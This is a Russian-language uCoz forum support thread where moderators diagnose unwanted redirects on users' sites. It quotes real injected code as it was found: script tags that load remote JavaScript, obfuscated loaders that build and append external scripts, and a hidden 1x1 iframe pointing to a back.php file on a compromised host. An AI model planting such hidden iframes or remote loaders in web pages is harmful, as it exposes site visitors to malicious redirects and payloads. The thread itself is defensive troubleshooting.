Модератор форума: Yuri_G  
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 526 | 21:17:15
Валерий_СЕВЕРИН, да. на ваш. на котором проблемы переброса

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Валерий_СЕВЕРИН
Сообщений: 10
Репутация: 0

Сообщение # 527 | 21:38:13
webanet, www.vals.ucoz.ua
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 528 | 21:46:19
Валерий_СЕВЕРИН, из блока сейчас удалить скрипт

Код
<script language="JavaScript" src="http://101widgets.com/14040001/130/93"></script>


из блока календарь удалить скрипт

Код
<script language="JavaScript" src="http://101widgets.com/00004012/170/187"></script>


дальше сделайте большой и четкий скрин блокировок касперского по вашему сайту

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Валерий_СЕВЕРИН
Сообщений: 10
Репутация: 0

Сообщение # 529 | 21:54:32
webanet, Спасибо, все исправил, меня изначально и насторожил этот код, ну с чем не шутит. Дай Бог чтоб все исправилось, всегда вроде был насчет кодов внимателен, наверно потерял стаж. А на счет Касперского я так и не понял с какой периодичностью он блокирует др. сайт. Просто временами то кинет то нет. Ну я думаю через недельку я Вам, если можно, отпишусь в ЛС. Спасибо за помощь! wink
CKORO
Сообщений: 13
Репутация: 2

Сообщение # 530 | 19:34:40
Помогите пожалуйста.
Я не новичек, никакого мусора, шаблонов, чужих скриптов, ничего не вставляю. Сегодня вставил только один баннер и через час сайт под группой гости стал перекидывать на порно ресурс. Баннер сразу снял, но мой сайт все равно перекидывает на эту порнуху. Проверил весь код, ничего не вижу. Посмотрите пожалуйста. Сайт сеичас закрыл, чтобы не видели пользователи. Если нужно открыть напишите я тут сразу открою и закрою

Доступно только для пользователей
Сообщение отредактировал CKORO - Вторник, 17 Дек 2013, 20:15:43
Yuri_G
uWeb support
uVip manager
Сообщений: 4337
Репутация: 943

Сообщение # 531 | 19:37:29
Цитата CKORO ()
Если нужно открыть напишите я тут сразу открою и закрою
отключите тех.работы

CKORO
Сообщений: 13
Репутация: 2

Сообщение # 532 | 19:39:03
Цитата Ucoz_fan ()
отключите тех.работы
отключил
Yuri_G
uWeb support
uVip manager
Сообщений: 4337
Репутация: 943

Сообщение # 533 | 19:45:02
Цитата CKORO ()
отключил
у меня все нормально работает, советую вам почистить кеш и проверить на других браузерах, я сейчас зашел с хрома последней версии и все отлично wink

Добавлено (17 Дек 2013, 19:45:02)
---------------------------------------------
вижу вы занимаетесь накруткой счетчиков посещаемости, смотрите вам это еще боком вылезет...


CKORO
Сообщений: 13
Репутация: 2

Сообщение # 534 | 19:50:33
Спасибо что посмотрели
только сеичас перебрасывало, сам не понимаю что происходит.

только вот про это вы зря написали

Цитата Ucoz_fanвижу вы занимаетесь накруткой счетчиков посещаемости, смотрите вам это еще боком вылезет...

У меня крупный проект, с большой аудиторией 5 лет почти, все пользователи
с поиска. О какой накрутке вы вообще говорите?? И зачем она мне?
Даже обидно както
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 535 | 19:55:06
CKORO, если то перебрасывает то нет, значит в одном из блоков рекламы что-то грязненькое крутится

или тут

Код
<script type="text/javascript" src="http://dynamic.exaccess.ru/asp/dynamic_script.asp?id_d=890036"></script>


или тут

Код
<script>
setTimeout(function()
{
  var _s=document.createElement('SC'+'RI'+'PT');
  _s.charset='UTF-8';_s.type='text/javascript';
  _s.src='http://t1.teaser-goods.ru/ldr.js';
  document.getElementsByTagName('body')[0].appendChild(_s);
},0);
</script>


или тут

Код
<script type="text/javascript">
setTimeout(function()
{
  var _s=document.createElement('SC'+'RI'+'PT');
  _s.charset='UTF-8';_s.type='text/javascript';
  _s.src='http://t2.lenta-novostei.com/ldrn.js';
  document.getElementsByTagName('body')[0].appendChild(_s);
},0);
</script>
или тут

Код
<script>//<!--
_rnd=Math.round((Math.random() * 200000));
_url = 'http://ukrbanner.net/b.p?s=990&r='+_rnd;
_size = ' width=468 height=60';
document.write('<iframe src="'+_url+'" '+_size+' frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>');
//-->
</script>


на каких страницах перебрасывало?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
CKORO
Сообщений: 13
Репутация: 2

Сообщение # 536 | 20:03:33
webanet,

Начало перебрасывать гдето час назад с любой страницы, закрыл сайт, начал снимать проверять, и кеш чистил все равно перебрасывало, потом опять закрыл, написал сюда, открыл и уже не перекидывает. Был еще вот такой код <script src='http://mediaground.org/gate?u=16'></script> там баннеры 468x60 , посмотрел весь код ничего подобного про порноссылки там не вижу, рекламируют одежду, банки.

Howlett
Сообщений: 42
Репутация: 0

Сообщение # 537 | 19:33:41
При заходе на сайт сегодня начало перебрасывать на другой. В коде нашел вот ЭТО

<iframe src="http://edengi.uz/wp-content/upgrade/back.php" width="1" height="1" frameborder="0"></iframe>

Стояла только в шаблоне главной сраницы. Что это такое и как попало в код, если лог безопасности ничего не показывает?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 538 | 19:45:20
Howlett, смените пароли на всякий. читайте //forum.ucoz.ru/forum/45-57475-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Howlett
Сообщений: 42
Репутация: 0

Сообщение # 539 | 19:58:44
webanet, это понятно, но если бы был взлом, это бы отразилось в логе безопасности,что кто-то заходил в админ панель с другим ай пи. Однако там ничего нет. Как тогда скрипт попал в код?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 540 | 20:09:11
Howlett, вот если бы зашли в панель, то были бы логи. а так могли зайти со стороны сайта как администратор. а вот при таком редактировании со стороны сайта логи не ведутся. поэтому всегда в таких случаях обязательно в первую очередь меняем пароль uID профиля администратора и убиваем всех других администраторов сайта и прочие группы с правами доступа к правке кода сайта

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Поиск: